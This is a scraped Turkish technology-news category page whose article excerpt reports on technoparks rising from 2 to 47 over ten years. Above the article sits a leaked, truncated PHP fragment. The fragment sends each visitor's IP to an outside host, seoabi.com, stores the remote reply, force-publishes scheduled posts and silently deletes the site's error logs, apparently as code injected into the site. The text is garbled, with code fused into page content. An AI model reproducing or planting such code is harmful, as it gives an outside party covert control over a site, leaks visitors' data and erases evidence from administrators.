$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> 2’den | Teknoloji Haberleri

2’den kategorisindeki tüm yazılar

Son Yazılar

“10 Yılda 2’den 47’ye Çıkardık”

Üniversiteler teknolojinin kaynağı olan bilginin üretildiği merkezlerin başında yer alıyor. Bilim, Sanayi ve Teknoloji Bakanı Nihat Ergün, bakanlığının yeni yapılanmadaki en önemli görev alanlarından birinin üniversite-sanayi işbirliğini tesis etmek olduğunu söyledi. Teknoparkların bu işbirliğinin en güzel örnekleri olduğunu belirten Ergün, 10 yıl önce 2 olan teknopark sayısını 47’ye çıkardıklarını